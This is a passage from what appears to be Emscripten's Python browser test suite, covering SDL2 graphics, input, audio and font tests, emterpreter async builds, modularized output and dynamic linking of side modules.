console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@flaky
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1', timeout=30)
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
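    # Use a custom page that offsets the canvas inside a positioned container, to check that
    # SDL2 mouse coordinates account for the canvas offset (TEST_SDL_MOUSE_OFFSETS).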
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
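    # Render on a proxied (worker) canvas and reftest the result; post() injects the reftest
    # harness into the generated page and defers window.close so rAFs can arrive first.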
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
@no_wasm_backend('emterpretify')
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_2(self):
# Error.stackTraceLimit defaults to 10 in Chrome, but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3', '--pre-js', 'pre.js', ])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions, '-g'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
@no_wasm_backend('emterpretify')
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
@no_wasm_backend('emterpretify')
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
@no_wasm_backend('emterpretify')
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@no_wasm_backend('emterpretify')
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
@no_wasm_backend('emterpretify')
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
@no_wasm_backend('emterpretify')
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
@no_wasm_backend('emterpretify')
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory, different from the default, that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@no_wasm_backend('dynamic linking')
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@no_wasm_backend('dynamic linking')
